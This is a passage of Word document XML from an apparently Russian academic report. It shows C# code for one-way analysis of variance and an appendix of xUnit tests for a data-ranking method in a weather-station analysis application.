      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>resy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>resAx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245E07EE" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            if (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>resy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> == 0 || </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>resAx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> == 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4662F6A6" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">                return;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9D1931" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>Fcrit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>Ftable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>neededFtableKey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDC534D" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>FdistributionCalculator</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>fdc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> = new </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>FdistributionCalculator</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15749D66" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            p = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>fdc.fcdistribution</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>resAx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>resy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>, F);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C6FF3D"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Math.Round</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>SSa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>, 3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3A8EF1"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Math.Round</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>SSe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>, 3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178A8DD8"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Math.Round</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>MSa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>, 3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3970463A"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Math.Round</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>MSe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>, 3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2342DFBC" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            F = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>Math.Round</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>(F, 3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578DFFC5" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            p = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>Math.Round</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>(p, 3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9A058D" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC2EBA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D3DC06" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5B71FC" w14:textId="2A2B895C" w:rsidR="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634161F7" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRDefault="00CC2EBA">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E174BE0" w14:textId="665DA377" w:rsidR="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="58" w:name="_Toc162709251"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ПРИЛОЖЕНИЕ Д (Модульные тесты для проверки работоспособности алгоритма дисперсионного анализа</w:t>
      </w:r>
      <w:r w:rsidRPr="00B549DB">
        <w:t>)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="58"/>
    </w:p>
    <w:p w14:paraId="1F1A33B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Xunit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3E480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ServerMVC.Controllers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5DDA8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ServerMVC.Models</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9570C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using</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ServerMVC.Infrastructure.Statistics</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0613F57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46BD473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FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>namespace</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ServerMVC.Test</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="66614F5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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2E627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class</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2B91AF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>MeteostationTest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1484A4E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3FB82AA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808080"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>///</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808080"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>&lt;summary&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174953F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808080"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>///</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Тестирование</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метода</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ранжирования</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данных</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008000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Тест без повторяющихся значений.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7326D18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33419EC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000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>[Fact]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77753E0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void</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RangeDataWithoutRepeat</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67D9E83D"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2DAF478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3, 8, 4, 5 });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3856BD1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b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 6, 7, 0 });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A0C8A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c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9, 2 });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3FDDA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dat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 a, b, c };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3627481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1C04FD2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nalysisController.RangeData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>(data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066FE157"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0D246DD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 9, 5, 6 });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4997BE61"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2, 7, 8, 1 });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6F7C2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0, 3 });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FBF4F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F14BB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07F1CCB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 0;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lt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>rangedData.Length</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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6246AB1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4C1F91A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j = 0; j &lt;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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>].Length</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j++</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7223F29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j],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j]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681E377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00"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A41A08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p>
    <w:p w14:paraId="72B8108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1A5F728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lastRenderedPageBreak/>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Тестирование метода ранжирования данных. Тест с повторяющимися значениями.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB84F6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6BCBC18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000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>[Fact]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CCCD2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void</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RangeDataWithRepaeat</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05E670E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74857EA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8, 9, 2, 2, 2 });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40586A0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b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3, 1, 4, 8, 1 });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE8876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c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6, 5, 3, 1 });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659F53B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d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5, 1, 6 });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5C1A8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dat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 a, b, c, d };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6473897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AnalysisController</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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6D3F7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nalysisController.RangeData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>(data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D28C2F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7FCD99C2"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5.5, 17, 6, 6, 6 });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D90A19D"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8.5, 2.5, 10, 15.5, 2.5 });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0094BA8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3.5, 11.5, 8.5, 2.5 });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C3E91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11.5, 2.5, 13.5 });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD1E55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 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>actual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B</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C</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ctualD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7158BCB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744D489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 0;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 &lt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>rangedData.Length</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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E7CAC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7E5C595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for</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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> j = 0; j &lt;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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>].Length</w:t>
      </w:r>
      <w:proofErr w:type="gram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j++</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DB4467"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actual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 xml:space="preserve">][j], </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>rangedData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>][j]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DC0473"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00"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A3923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p>
    <w:p w14:paraId="3E2DD55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w:t>
      </w:r>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>summary</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5E911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eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>///</w:t>
      </w:r>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Верификация алгоритма однофакторного дисперсионного анализа на основе книги </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Доспехова</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Б.А. "Методика полевого опыта", на странице 223</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F136C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eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>///</w:t>
      </w:r>
